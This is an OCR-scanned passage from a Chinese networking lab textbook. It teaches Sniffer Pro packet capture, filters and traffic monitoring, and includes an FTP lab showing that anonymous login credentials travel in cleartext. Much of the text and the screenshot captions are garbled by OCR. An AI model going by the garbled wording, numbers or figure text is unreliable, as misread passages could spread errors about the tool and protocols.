专家 分 析 系统 能 够 对 缓冲 区 内 的 数据 包 进 行 综合 分 析 , 将 捕获 内 容 按照 服务 .应 用 、 连 
接 、 工 作 站 、 路 由 和 子 网 等 类 别 进行 分 类 统计 ,并 对 存在 安全 隐患 和 问题 的 服务 或 连接 进行 
分 析 , 给 出 确切 的 结论 。 对 于 问题 内 容 , 将 注 明 其 所 属 层次 (Layer)、 诊 断 方式 (Diagnoses)、 
基本 征兆 (Symptoms) 和 目标 (Objects)。 

专家 分 析 平 台 可 以 对 网 络 流量 进行 实时 分 析 , 并 提供 客观 翔实 的 诊断 结果 。 主 要 包括 
“专家 分 析 系 统 ”“ 解 码 系统 ”“ 和 矩阵 ?"“ 主 机 列表 ”“ 协 议 列表 ”以 及 “统计 分 析 系 统 ”, 只 要 
单 击 “停止 并 显示 ?按钮 就 可 以 查看 具体 的 网 络 分 析 数 据 , 如 图 3. 2. 22 所 示 。 
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图 3222 报 文 捕获 显示 界面 
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通过 专家 分 析 平 台 可 以 捕获 在 网 络 会 话 过 程 中 存在 的 各 类 潜在 问题 。 这 些 问 题 被 定义 
为 症状 或 诊断 。 

。 症状 : 网 络 会 话 情况 超过 专家 设 定 阅 值 , 表 示 网 络 存 在 潜在 问题 。 

。 诊 断 : 多 个 一 起 分 析 的 症状 或 复发 率 较 高 的 特定 症状 ,对 于 诊断 必须 立即 检查 。 

。 专家 系统 分 类 信息 : 显示 网 络 各 个 分 析 层 ,其 层次 性 与 OSI 层次 模型 相 类 似 。 

。 专家 系统 摘要 信息 : 根据 “摘要 显示 ” 设 定 的 各 层 显 示 数 据 。 

对 于 某 项 统计 分 析 可 以 通过 双击 来 查看 对 应 记录 的 详细 统计 信息 ,如 图 3. 2. 23 所 示 。 
对 于 每 一 项 记录 都 可 以 通过 查看 帮助 的 方式 来 了 解 产 生 的 原因 。 
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图 3223 报 文 详细 信息 


3. 解码 分 析 

单 击 专 家 系统 窗口 下 方 的 “解码 ”按钮 ,就 可 以 对 具体 的 记录 进行 解码 分 析 , 如 图 3. 2. 24 
所 示 。 页 面 自 上 而 下 由 3 部 分 组 成 : 捕获 的 报 文 、 解 码 后 的 内 容 以 及 解码 后 的 二 进 制 编码 
信息 。 
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图 3224 报 文 解码 


对 于 解码 分 析 人 员 来 说 ,只 有 充分 掌握 各 类 网 络 协议 ,才能 看 介 解 析出 来 的 报 文 。 要 能 
够 利用 软件 解码 分 析 来 解决 问题 ,关键 是 要 对 各 种 层次 的 协议 有 充分 的 了 解 。 


4. 统计 分 析 





对 于 各 种 报 文 信息 ,专家 系统 提供 了 和 矩阵 分 析 (Matrix, 如 图 3. 2. 25 所 示 ) .主机 列表 





(Host Table, 如 图 3. 2. 26 所 示 ) ,协议 统计 (Protocol Dist. lil] 3. 2. 27 所 示 ) 以 及 会 话 统计 
(Statistics, 如 图 3. 2. 28 所 示 ) 等 多 种 统计 分 析 功 能 ,可 以 按照 MAC 地 址 ,IP 地 址 和 协议 类 


型 等 内 容 进行 多 种 组 合 分 析 。 
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图 3225 和 矩阵 分 析 
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3227 协议 统计 分 析 
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3228 会 话 统计 分 析 
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5. 捕获 条 件 设置 


在 Sniffer Pro 环境 下 ,可 以 对 捕获 条 件 进 行 设 置 ,获得 用 户 需 要 的 报 文 协议 信息 。 基 


本 的 捕获 条 件 有 两 种 : 


(1) 链 路 层 捕获 : 按照 源 MAC 地 址 和 目的 MAC 地 址 设 定 捕获 条 件 , 输 入 方式 为 十 六 


进 制 MAC 地 址 ,如 000D98ABCDFE。 


(2) IP 层 捕获 : 按 源 IP 地 址 和 目的 IP 设 定 捕获 条 件 。 输 入 方式 为 DP 地 址 , 如 
192. 168. 1. 157。 要 特别 注意 的 是 .如果 选 择 IP 层 捕获 方式 , 则 ARP 等 类 型 报 文 信息 将 被 


用 户 可 以 通过 单 击 快捷 面板 上 的 豆 按 钮 ,或 者 选择 “捕获 ?” 汪 单 下 的 “定义 过 滤器 ”命令 
来 设 定 捕获 条 件 , 如 图 3. 2. 29 所 示 。 
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图 3229 过 滤器 操作 界面 
过 滤器 主要 包括 “摘要 ”“ 地 址 ”“ 数 据 模式 ”、“ 
。“ 摘 要 ?选项 卡 显示 当前 缓冲 器 的 设 定 情况 。 
“地 址 ”选项 卡 用 来 进行 缓冲 器 捕获 条 件 的 设 定 , 如 图 3.2. 30 所 示 。 
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图 3230 捕获 条 件 定义 
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。“ 数 据 模式 ”选项 卡 用 来 编辑 捕获 条 件 。 

。“ 高 级 ”选项 卡 用 来 设 定 捕获 的 协议 .数据 包 类 型 和 数据 包 大 小 等 信息 。 

。“ 缓 冲 ” 选 项 卡 用 来 对 缓冲 区 进行 详细 配置 。 

在 “高 级 ”选项 卡 下 ,可 以 更 加 详细 地 配置 捕获 条 件 : 可 以 选择 需要 捕获 的 协议 条 件 、 数 
据 包 具体 长 度 和 数据 包 类 型 等 。 可 以 将 当前 设置 的 过 滤 规 则 条 件 保存 为 配置 文件 
(Profiles) 。 在 “定义 过 滤器 -捕获 "对 话 框 中 ,可 以 单 击 [AR 下拉 列表 选择 保存 
的 捕获 条 件 。 

在 “数据 模式 ”选项 卡 下 ,可 以 编辑 更 加 详细 的 捕获 条 件 , 如 图 3. 2. 31 所 示 。 利 用 数据 
模式 的 方式 可 以 实现 复杂 报 文 过 滤 , 但 同时 增加 了 捕获 的 时 间 复 杂 度 。 
定义 过 滤器 -者 获 区 区 
RE | 地 址 BCU | 高 级 | ae | 为 设置 


模板 关系 控制 
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图 3231 捕获 条 件 详细 配置 界面 
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实验 报告 要 求 


。 实验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


3.2.4 网 络 监视 实验 
实验 器 材 


Sniffer Pro 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7),1 台 。 


预习 要 求 


CD 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer Pro 软件 数据 捕获 功能 的 操作 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 
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(4) 做 好 预习 报告 。 


实验 任务 


通过 本 实验 ,掌握 以 下 技能 : 
(1) 熟练 掌握 Sniffer Pro 的 各 项 网 络 监视 模块 的 使 用 。 
(2) 熟练 运用 网 络 监 视 功能 ,撰写 网 络 动态 运行 报告 。 


实验 环境 


本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 


预备 知识 


(1) TCP/IP 原理 及 基本 协议 。 
(2) 数据 交换 技术 概念 及 原理 。 
(3) 路 由 技术 及 实现 方式 。 


Scl Jp Ue 


选择 监视 项 ”3 


机 列表 ”“ 和 矩阵 ”“ 


i Age 
心 o 


菜单 或 单 击 工 具 栏 上 的 按钮 ,可 依次 看 到 如 下 监视 功能 :“ 仪 表 板 ”“ 主 
请 求 响应 时 间 ”“ 历 史 取 样 " “协议 分 析 ”、“ 全 局 统计 表 ” 和 “警报 日 


1. 仪表 板 (Dashboard) 
单 击 工具 栏 上 的 型 按 钮 , 即 可 弹出 仪表 板 。 在 仪表 板 上 方 , 可 对 监视 行为 进行 具体 配 
置 , 并 对 监视 内 容 进行 重 置 。 如 图 3.2.32 所 示 ,网 络 监视 仪表 板 包 括 3 个 仪表 。 








3232 网 络 监视 仪表 板 


第 一 个 仪表 显示 的 是 网 络 使 用 率 (utilization) ,第 二 个 仪表 显示 的 是 网 络 的 每 秒 钟 通过 


的 包 数 量 (packets/ 


s) ,第 三 个 仪表 显示 的 是 网 络 的 每 秒 错误 率 (errors/s)。 下 面 的 数字 中 ， 


前 面 的 数字 表示 当前 值 , 后 面 的 数字 表示 最 大 值 。 通 过 3 个 仪表 可 以 直观 地 观察 到 网 络 的 


使 用 情况 ,仪表 的 纪 
网 络 线路 不 好 或 者 


[ 色 区 域 是 警戒 区 域 ,如 果 发 现 有 指针 到 了 红色 区 域 ,就 该 引起 重视 ,说 明 
网 络 负荷 太 大 。 如 果 需 要 获得 更 为 详细 的 网 络 整 体 使 用 情况 ,可 以 单 击 





“细节 ”按钮 ,查看 数据 统计 结果 。 

如 图 3. 2. 33 所 示 ,Drops 表示 网 络 中 遗失 的 数据 包 数 量 (在 网 络 活动 高 峰 期 经 常会 遗 
失 数 据 包 ) ,过 多 的 广播 会 使 网 络 上 所 有 系统 的 性 能 整体 下 降 。 在 粒度 分 析 表 格 中 列 出 了 网 
络 中 数据 包 的 分 布 状态 ,包括 64B,65—127B,128—255B 等 不 同 字 节 的 数据 包 总 数 。 错 误 
描述 表格 中 列 出 了 错误 出 现 率 ,也 就 是 errors/s。 
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图 3233 网 络 监视 详细 信息 


通过 3 个 仪表 盘 , 可 以 很 容易 地 看 到 从 捕获 开始 .有 多 少数 据 包 经 过 网 络 , 多 少 帧 被 过 
滤 , 以 及 遗失 了 多 少 帧 等 情况 ,还 可 以 看 到 网 络 的 利用 率 .数据 包 数 目 和 广播 数 , 如 果 发 现 网 
络 在 每 天 的 特定 时 间 都 会 收 到 大 量 的 组 播 数据 包 ,就 说 明 网 络 可 能 出 现 了 问题 , 需 及 时 分 析 
哪个 应 用 程序 在 发 送 组 播 数据 包 。 

Sniffer 的 很 多 网 络 分 析 结 果 都 可 以 设 定 阔 值 , 若 超出 阔 值 ,报警 记录 就 会 生成 一 条 信 
息 , 并 在 仪表 盘 上 以 红色 来 标记 阔 值 的 警告 值 。 网 络 管理 员 应 记录 警告 信息 ,并 且 查 看 系统 
超过 了 阔 值 多 少 次 ,以 及 超出 阔 值 的 频率 是 多 少 ,这 些 信息 有 助 于 确定 网 络 是 否 有 问题 。 

单 击 仪表 板 上 的 Set Thresholds (i zE PY AL) fc 4H . tT IF Dashboard Properties 对 话 框 ， 
即 可 根据 自己 的 网 络 状况 来 配置 仪表 阔 值 ,以 保证 仪表 能 准确 地 显示 网 络 情况 。 

如 图 3. 2. 34 所 示 , 可 以 在 仪表 板 的 下 方 查看 网 络 监视 曲线 图 ,主要 包括 网 络 .错误 描述 
和 粒度 分 布 3 种 情况 。Long Term 选项 每 30min 采样 一 次 ,一 共 可 以 采样 24h;Short Term 
每 30s 采样 一 次 ,可 以 采样 25min, 

OO 200F68216 161507 © Short Term © Long Term 
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图 3234 网 络 监视 曲线 图 
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2. 主机 列表 (host table) 

单 击 工具 栏 上 的 昌 按 钮 ,或 选择 “监视 器 ?菜单 内 的 “主机 列表 ”命令 ,界面 中 显示 
的 是 所 有 在 线 的 本 网 主机 地 址 以 及 外 网 服务 器 地 址 信息 。 可 以 分 别 选择 MAC 地 址 、 
IP 地 址 以 及 IPX 地 址 。 通 常情 况 下 ,网 络 中 所 有 终端 的 对 外 数据 交换 行为 ,如 浏览 网 
站 、 上 传 下 载 等 ,都 是 各 终端 与 网 关 在 数据 链 路 层 中 进行 的 ,为 了 分 析 链 路 层 的 数据 交 
换行 为 ,需要 获取 MAC 地 址 的 连接 情况 。 通 过 主机 列表 ,可 以 直观 地 看 到 流量 最 大 的 
前 10 位 主机 地 址 。 

在 查看 网 络 主机 信息 时 ,默认 以 MAC 地 址 形式 显示 网 络 中 的 计算 机 。 如 果 计 算 机 处 
于 局 域 网 中 ,可 以 清楚 地 显示 计算 机 的 MAC 地 址 ;如 果 计 算 机 处 于 Internet 中 , 则 不 能 获 
得 计算 机 的 MAC 地 址 ,此 时 以 IP 地 址 形式 显示 。 单 击 窗口 下 方 的 IP 标签 , 即 可 显示 计算 
机 的 IP 地 址 ,这 样 可 以 更 清楚 地 查看 到 各 人 台 计 算 机 。 

在 列表 中 ,可 以 通过 单 击 "广播 ?或 “多 点 传送 ?对 广播 量 进 行 统计 。IP 的 广播 有 3 
fi: 255.255.255. 255 为 本 地 广播 ,192. 168. 1. 255 为 子 网 广播 ,192. 168. 1. 255 WEF 
网 广播 。 

为 了 方便 查看 连接 地 址 信息 ,设置 了 “细节 ”“ 饼 状 图 ”“ 柱 状 图 ”等 统计 方式 以 及 “ 单 向 
地 址 查看 ”“ 输 出 ”“ 条 件 过 滤 ” 等 多 种 选项 。 在 统计 分 析 的 柱状 图 与 饼 状 图 中 ,网 关 流 量 依 
次 减 小 。 当 发 现 某 个 网 关 流 量 与 其 他 终端 流量 差距 悬殊 时 , 则 需要 重点 检查 目标 主机 是 否 
有 大 网 络 流量 的 操作 。 如 果 发 现 某 台 计算 机 在 某 个 时 间 段 内 发 送 或 接收 了 大 量 数据 , 则 说 
明 可 能 存在 网 络 异 常 。 

当选 中 某 台 主机 时 ,可 以 通过 “条 件 过 滤 ” 设 置 过 滤 条 件 , 系 统 自动 产生 一 个 新 的 过 滤 
器 。 在 流量 分 析 过 程 中 ,根据 包 结构 去 取得 主机 信息 , 即 目 的 MAC、 源 MAC 或 目的 IP、 源 
IP。 为 了 查看 更 为 详细 的 主机 交互 情况 ,可 以 单 击 列表 中 的 任意 项 ,如 图 3. 2. 35 所 示 。 单 
击 IP 地 址 为 114. 80. 93. 60 的 列表 项 ,可 以 显示 由 114. 80. 93. 60 主机 发 送 或 接收 的 数据 包 
情况 ,如 图 3. 2. 36 所 示 。 
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图 3235 主机 列表 
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HRAMA T 114.80.93.60 











图 3236 单机 连接 情况 








3. 和 矩阵 (matrix) 
单 击 工具 栏 上 的 鸭 按 钮 ,或 选择 “监视 器 ?菜单 内 的 “和 矩阵 ?命令 ,可 以 显示 全 网 的 所 有 
连接 情况 , 即 主 机 会 话 情况 ,如 图 3.2. 37 所 示 











妈 3237 全 网 连接 矩阵 








图 中 处 于 活动 状态 的 网 络 连接 标记 为 绿色 ,已 发 生 的 网 络 连接 标记 为 蓝 色 ,线条 的 粗细 
与 流量 的 大 小 成 正比 ,将 鼠标 移动 至 线条 处 ,会 显示 流量 双方 位 置 . 通 信 流 量 大 小 以 及 流量 
占 当 前 网 络 流量 的 百分比 。 
。 对 于 LAN, 可 以 分 析 MAC 层 、IP 网 络 层 、IP 应 用 层 、IPX 网 络 层 和 IPX 传输 层 。 

。 对 于 WAN, 可 以 分 析 链 路 层 、IP 网 络 层 、IP 应 用 层 、IPX 网 络 层 和 IPX 传输 层 。 
* 69 。 











和 矩阵 可 以 说 是 Sniffer Pro 中 最 常用 的 功能 , 它 以 矩阵 方式 列 出 当前 网 络 中 的 连接 情 
况 , 用 户 可 以 清楚 地 看 到 某 个 计算 机 正在 与 哪些 地 址 进行 连接 。 

“通信 量 图 ?可 以 显示 节点 间 网 络 通信 量 的 全 面 信息 ,而 且 可 以 查看 特定 网 络 节点 信息 。 

“大 纲 ”简要 汇总 每 对 网 络 节点 间 发 送 的 总 字 节 数 和 总 报 文 数 ,可 以 查看 独立 网 络 连接 
的 数据 包 使 用 情况 ,也 可 以 右 击 选择 独立 的 IP 终端 节点 。 如 果 连 接 数 目 非常 大 ,显然 不 是 
一 种 正常 的 业务 连接 ,此 时 需要 认真 检查 每 一 个 连接 的 会 话 情 况 。 

如 图 3. 2. 38 所 示 ,“ 细 节 ” 可 以 按 高 层 协议 分 类 情况 查看 网 络 连接 及 数据 包 使 用 情况 。 
此 外 ,“ 柱 状 图 ”和 "人 饼 状 图 ”都 能 够 实时 显示 网 络 利 用 率 在 前 10 位 的 网 络 连接 会 话 。 利 用 和 矩 
阵 监视 器 可 以 评估 网 络 运行 状况 和 流量 异常 ,特别 适合 用 来 检测 病毒 。 
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图 3238 不 同 网 络 协议 的 网 络 连接 情况 


对 于 未 知 协议 ,可 以 通过 选择 “工具 ”菜单 的 “设置 ”命令 下 的 “协议 ” 栏 进行 自 定义 ,为 菜 
端口 指定 协议 名 称 , 以 便 更 好 地 检测 网 络 流量 。 
通过 和 矩阵 功能 可 以 发 现 网 络 中 使 用 BT 等 P2P 软件 或 中 了 蠕虫 病毒 的 用 户 。 如 果 某 个 
用 户 的 并 发 连接 数 特别 多 ,并 且 在 不 断 地 向 其 他 计算 机 发 送 数据 ,说 明 该 计算 机 很 可 能 中 了 
蠕虫 等 病毒 。 此 时 ,网 络 管理 员 应 及 时 封 掉 该 计算 机 所 连接 的 交换 机 端口 ,并 对 该 计算 机 查 
杀 病 毒 。 
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4. 应 用 响应 时 间 (Application Response Time. ART) 

ART 是 指 一 个 客户 端 发 出 一 个 请 求 到 服务 器 响应 回来 的 时 间 差 。 一 般 来 说 ,ART 的 
快慢 是 应 用 性 能 的 一 个 重要 指标 。 应 用 性 能 主要 决定 于 几 个 因素 : 网 络 因素 .服务器 因素 、 
客户 端 因素 和 应 用 协议 因素 。 

ART 用 来 显示 网 络 中 Web 网 站 的 连接 情况 ,可 以 看 到 局 域 网 中 有 哪些 计算 机 正在 上 
网 ,浏览 的 是 哪些 网 站 等 ,如 图 3. 2. 39 所 示 。 该 窗口 中 显示 局 域 网 内 的 通信 及 数据 传输 大 
小 ,以 及 本 地 计算 机 与 Web 网 站 的 IP 地 址 。 通 过 单 击 左 侧 工具 栏 中 的 图 标 ,以 柱状 图 方式 
显示 网 络 中 计算 机 的 数据 传输 情况 ,不 同 的 柱 代 表 右 侧 列表 中 的 相应 连接 , 柱 的 长 短 表示 传 
输 量 的 大 小 。 
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图 3239 AHT 监 视窗 口 


如 果 一 个 数据 包 的 目的 IP 是 192. 168. 1.1, 目 的 端口 是 80 ,那么 就 可 以 认定 192. 168. 
1.1 是 HTTP 服务 器 地 址 ,而 源 IP 就 是 客户 地 址 ,主要 列表 项 含义 如 下 : 

。 AvgRsp: 平均 响应 时 间 。 

* 90%Rsp: 90% 响 应 时 间 , 去 掉头 尾 各 5% 。 

e MinRsp/MaxRsp: 最 小 /最 大 的 响应 时 间 , 以 毫秒 为 单位 。 

。 TotalRsp: 响应 次 数 。 

TEP RAW AN O~25ms,25~50ms 等 时 间 段 内 的 响应 次 数 。 

通过 单 击 左 侧 的 “属性 ”按钮 , 自 定义 所 要 监视 的 网 络 协议 。 当 协议 不 存在 时 ,可 以 利用 
对 应 端口 号 在 “工具 ”菜单 的 “选项 ”对 话 框 下 添加 协议 。 

利用 ART 的 监视 功能 ,可 以 快速 获得 某 一 业务 的 响应 时 间 。 首 先 获 得 业务 源 地 址 
的 服务 器 /客户 端 响应 时 间 ( 网 络 消耗 时 间 ) 和 服务 器 处 理 时 间 ; 同 时 ,在 业务 的 目的 地 址 
获得 服务 器 处 理 时 间 ,利用 Sniffer Pro 可 以 判断 影响 业务 性 能 的 因素 是 来 自 网 络 还 是 服 
务 器 。 通 过 长 期 的 观测 ,还 可 以 设 定 每 一 个 业务 的 响应 基准 线 , 以 此 判断 业务 运行 是 否 
正常 。 

5. 历史 取样 (history sample) 

历史 取样 即 收集 一 段 时 间 内 的 各 种 网 络 流量 信息 。 通 过 这 些 信息 可 以 建立 网 络 运行 状 

E i 


态 基 线 ,设置 网 络 异常 的 报警 阔 值 。 默 认 情 况 下 ,历史 采样 的 缓冲 区 有 3600 个 采样 点 ,每 隔 
15s 进行 一 次 采样 ,采样 15h 后 自动 停止 。 如 果 想 延长 采样 时 间 , 可 以 通过 修改 采样 间隔 时 
间或 者 设置 缓冲 区 属性 的 方式 实现 。 具 体 做 法 是 : 单 击 左 侧 的 “属性 ”按钮 ,修改 采样 间隔 ， 
并 勾 选 “ 当 缓 冲 区 满 时 覆盖 ”的 条 件 。 此 外 ,还 可 以 灵活 地 选择 多 种 采样 项 目 。 

6. 协议 分 布 (protocol distribution) 

通过 协议 分 布 可 以 分 析 网 络 中 不 同 协 议 的 使 用 情况 。 可 以 直观 地 看 到 当前 网 络 流量 中 
的 协议 分 布 情况 ,了 解 各 类 网 络 协议 的 分 布 情况 以 后 ,可 以 找到 网 络 中 流量 最 大 的 主机 ,这 
意味 着 该 主机 对 网 络 的 影响 也 最 大 ,之 后 可 以 利用 主机 列表 的 饼 状 图 功能 找到 流量 最 大 的 
机 器 。 

7. 全 局 统计 表 

全 局 统计 数据 能 够 显示 网 络 的 总 体 活 动情 况 , 并 确认 各 类 数据 包 通信 和 负载 的 大 小 ,从 而 
分 析 网 络 的 总 体 性 能 及 存在 的 问题 。 全 局 统计 表 提 供与 网 络 流量 相关 的 各 类 统计 测量 
TH: 

* 粒度 分 布 : 根据 数据 包 大 小 与 监测 到 的 通信 总 量 之 比 ,显示 每 个 数据 包 的 发 生 频 率 。 

。 利用 率 分 布 : 以 10% 为 基本 度量 单位 ,显示 每 组 空间 内 网 络 带 宽 的 分 布 情况 。 

8. 警报 日 志 

警报 日 志 全 面 监测 和 记录 网 络 异 常事 件 。 一 旦 超过 用 户 设 定 的 阔 值 参数 ,警报 器 会 在 
警报 日 志 中 记录 相应 事件 。 警 报 分 为 5 种 严重 性 级 别 : 严重 、 重 要 、 次 要 、 警 告 和 通知 。 对 
于 警报 日 志 中 的 每 个 警报 事件 ,都 可 以 观察 触发 警报 的 具体 节点 类 型 .发 生 时 间 、 警 报 级 别 
以 及 描述 信息 等 。 系 统 默认 的 警报 级 别 如 表 3. 2. 3 所 示 。 


表 3.2.3 系统 默认 警报 级 别 
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选择 “工具 ”菜单 中 的 “选项 ”命令 , 单 击 “ 警 报 ” 选 项 卡 ,选择 “定义 强度 …”, 可 以 修改 警 
报 强度 ,如 图 3. 2. 40 所 示 。 和 警报 可 以 设 定 为 声音 .电子 邮件 、 拨 呼叫 器 以 及 警报 文本 4 类 。 
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za quc | 
警报 强度 
1 | Threshold: Over upper imit Ean 了 
2 | 地 址 :复制 P 地 址 危急 的 | 
3 | 地 址 : MEESE 通知 | 
m | 








A320 警报 级 别 调整 界面 
° 72° 


同时 ,可 以 对 专家 系统 的 实时 分 析 数 据 设 定 警 报 级 别 。 选 择 “ 工 具 ” 菜 单 下 的 “专家 系 


统 " 命 令 , 单 击 “ 警 报 ” 选 项 卡 , 将 设 定好 严重 性 级 别 的 各 类 系统 层 项 目的 “记录 警报 ”选项 设 
定 为 “是 ”。 在 正常 运行 过 程 中 ,选中 “警报 ”选项 卡 上 的 “启用 新 警报 ” 复 选 框 即 可 。 


实验 报告 要 求 


。 实 验 目 的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


3.3 网 络 分 析 扩 展 实验 


为 了 对 Sniffer Pro 的 使 用 有 更 加 综合 和 全 面 的 了 解 ,本 节 设 计 了 网 络 协议 嗅 探 和 协议 


3.3.1 网 络 协议 嗅 探 
实验 器 材 


Sniffer Pro 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7).1 £i. 


预习 要 求 

CD 做 好 实验 预习 ,复习 网 络 协议 的 有 关内 容 。 
(2) 复习 Sniffer Pro 软件 的 操作 方法 。 

(3) 熟悉 实验 过 程 和 基本 操作 流程 。 

(4) 做 好 预习 报告 。 

实验 任务 


通过 本 实验 ,理解 Sniffer Pro 常用 工具 的 配置 方法 ,明确 多 数 相关 协议 的 明文 传输 问 


。 理 解 TCP/IP 主要 协议 的 报头 结构 ,掌握 TCP/IP 网 络 的 安全 风险 。 


实验 环境 
本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 
预备 知识 


(1) TCP/IP 原理 及 基本 协议 。 
(2) FTP 站 点 搭建 技术 及 基本 协议 。 


实验 步骤 
(D 开启 Sniffer Pro, 
SE. 


(2) 捕获 数据 包 前 的 准备 工作 。 

在 默认 情况 下 ,Sniffer Pro 将 捕获 其 接 和 人 网络 中 的 所 有 数据 包 , 但 在 某 些 场景 下 ,有 些 
数据 包 可 能 不 是 我 们 所 需要 的 ,为 了 快速 定位 网 络 问题 所 在 ,有 必要 对 所 要 捕获 的 数据 包 进 
行 过 滤 。 可 以 通过 过 滤器 ,定义 Sniffer Pro 捕获 数据 包 的 过 滤 规 则 ,过 滤 规 则 包括 网 络 地 
址 的 定义 和 几 百 种 协议 的 定义 。 定 义 过 滤 规 则 的 做 法 如 下 。 

在 主 界面 选择 “捕获 ”菜单 中 的 “定义 过 滤器 "命令 ,出 现 如 图 3. 3. 1 所 示 的 对 话 框 。 


摘要 | 地 址 | 数据 模式 | 高 级 | eR | 


BEZE 
组 中 器 大 小 :8 Mee 字 节 


缓冲 器 动作 .覆盖 rap) 
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图 331 ”定义 过 滤器 -捕获 " WIRE 
其 中 “地 址 ”选项 卡 是 最 常用 的 过 滤 手 段 。 包 括 MAC 地 址 、IP 地 址 和 IPX 地 址 的 过 滤 
定义 。 以 定义 IP 地 址 过 滤 为 例 ,如 图 3. 3. 2 所 示 。 


摘要 ”地 址 | 数据 模式 | 高 级 em | 
地 址 类 型 : (A) 已 知 的 地 址 ; Dragable) 0 






任意 的 
B9 广播 /多 点 传送 地 址 
-È HS 
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A 332 IP 地 址 过 滤 设 定 界面 


当 需 要 捕获 地 址 为 192. 168. 1. 224 的 主机 与 其 他 主机 间 的 数据 通信 时 ,需要 首先 确定 
“地 址 类 型 "为 IP,“ 模 式 ”为 “包含 ”, 若 选择 “排除 ”, 则 表示 捕获 条 件 为 除 本 主机 以 外 的 所 有 
数据 通信 。 在 下 方 的 位 置 选项 中 ,在 左右 任意 一 侧 填写 主机 地 址 , 即 192. 168. 1. 224, 而 另 
一 侧 可 填写 any, 完 成 通信 地 址 定义 。 
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- BS BRA he EMA MECH BE 

。 图 一 国 表示 由 被 测 主机 发 送 的 数据 包 。 

+ 图 僵 为 表 示 由 被 测 主 机 接收 的 数据 包 。 

在 完成 上 述 设置 后 ,按照 需要 捕获 的 数据 包 类 型 选择 可 用 协议 ,如 HTTP, DNS 等 , 需 
要 特别 的 注意 的 是 DNS, NET BIOS 的 数据 包 有 些 属 于 UDP 协议 ,因此 ,需要 在 UDP 选项 
卡 中 进行 类 似 TCP 选项 卡 的 选择 工作 ,否则 捕获 的 数据 包 将 不 完整 。 

在 “高 级 ”选项 卡 内 ,可 以 定义 数据 包 大 小 (68 一 128B) .缓冲 区 大 小 以 及 文件 存放 位 置 


等 ,具体 内 容 见 图 3. 3. 3。 















摘要 | 地 址 inest mA | 组 中 | 
OW Bl 

















数据 包 大 小 G) -数据 包 类 型 1) 
> ] 加 常规 ^ 
= facecie 
所 有 的 大 小 [ATabbers - 
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A333 协议 过 滤 设 定 界面 


(3) 捕获 数据 协议 。 
将 定义 好 的 过 滤器 应 用 于 捕获 操作 中 。 启 动 “捕获 ”功能 ,就 可 以 运用 各 种 网 络 监 控 功 


能 分 析 网 络 数据 流量 及 各 种 数据 包 具 体 情 况 。 
实验 报告 要 求 


。 实 验 目的 。 

。 附 上 实验 过 程 的 截图 和 结果 截图 。 
。 阐述 遇 到 的 问题 以 及 解决 方法 。 
。 阐述 收获 与 体会 。 


3.3.2 FIP 协议 分 析 

实验 器 材 

Sniffer Pro 软件 系统 ,1 套 。 
PC(Windows XP/Windows 7) .1 台 。 
预习 要 求 


CD 做 好 实验 预习 ,复习 网 络 协议 有 关内 容 。 
« 75 s 


(2) 复习 Sniffer Pro 软件 的 操作 方法 。 
(3) 熟悉 实验 过 程 和 基本 操作 流程 。 
(4) 做 好 预习 报告 。 


实验 任务 

通过 本 实验 ,掌握 利用 Sniffer Pro 软件 捕获 和 分 析 网 络 协议 的 具体 方法 。 

实验 环境 

本 实验 采用 一 个 已 经 连接 并 配置 好 的 局 域 网 环境 。PC 上 安装 Windows 操作 系统 。 

预备 知识 

(1) FTP 原理 及 基本 协议 。 

(2) 网 络 协议 分 析 技 术 的 综合 运用 。 

Scu Ap 

按照 实际 需要 ,定义 如 图 3. 3. 4 所 示 的 过 滤器 ,并 应 用 该 过 滤器 捕获 FTP 协议 信息 。 
运行 数据 包 捕获 功能 。 


摘要 eu | 数据 模式 | 高 级 “| 组 趾 | 


类 型 : IP 


模式 : 包含 
125. 223. 124. 124 -一 > 任意 的 


日 高 级 的 
协议 ; IEEE802.11, TCP, UDP, IPX, OSI 


缓冲 器 大 小 : 8 Meg 字 节 
SRE: HH frap) 
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图 334 定义 过 滤器 


在 Sniffer Pro 捕获 状态 下 ,进行 FTP 站 点 操作 。 如 图 3. 3. 5 所 示 ,登录 FTP 站 点 ,位 
置信 息 为 ftp. hrbeu. edu. cn, 用 户 名 和 密码 均 为 匿名 (anonymous)。 看 到 系统 登录 成 功 的 
提示 后 ,用 户 可 以 自 定义 操作 ,对 FTP 站 点 和 文件 进行 操作 。 

通过 单 击 “ 捕 获 停 止 " 或 者 “停止 并 显示 ”按钮 停止 Sniffer Pro 捕获 操作 ,并 把 捕获 的 数 
据 包 进行 解码 和 显示 ,如 图 3.3.6 所 示 。 通 过 对 报 文 解析 ,可 以 看 到 Sniffer Pro 捕获 到 了 
用 户 登 录 FTP 的 用 户 名 称 和 明文 密码 ,对 于 用 户 进行 的 若干 FTP 站 点 操作 行为 , Sniffer 
Pro 都 能 够 捕获 到 相关 信息 。 
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E CAWindows\system32\cmd.exe - ftp ftp.hrbeu.edu.cn 


Microsoft Windows [jf]. 6.1.76881 
HA cc) 2889 Microsoft Cor 


sunjianguo>ftp ftp-h 

ftp2087.h .edu.cn 

FIPd 2.0. 

2087. hrbeu.edu.cn:(none>>: anonymou 
pecify the pas "d 


Login successful. 
list 














Snif2: 解码 , 17/27 以 太 网 帧 
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5 (missing data?) 















Rel 时 间 ^ 
00 





4977 900 473 (missing data?)|513 00 
243777 5-1300 TEN-473 (missing data?)| 513 00 = 
ES TCP: ——— TCP header ——— n 
B Te 
L3 TCP: Source port * 54453 (Dynamic and/or Private) 


{3 TCP: Destination port 21 (FTP-ctrl) 
Å TCP: Sequence number 1179230700 
Bj TCP: Next expected Seq number= 1179230716 








00000000; 00 19 c6 00 60 ad 00 Od Se 8c 38 68 08 00 45 00 777 
00000010: 00 38 61 b1 40 00 80 06 00 00 7d df 7c 7c ca 76 

00000020: bü fe B50 e000 E neni 
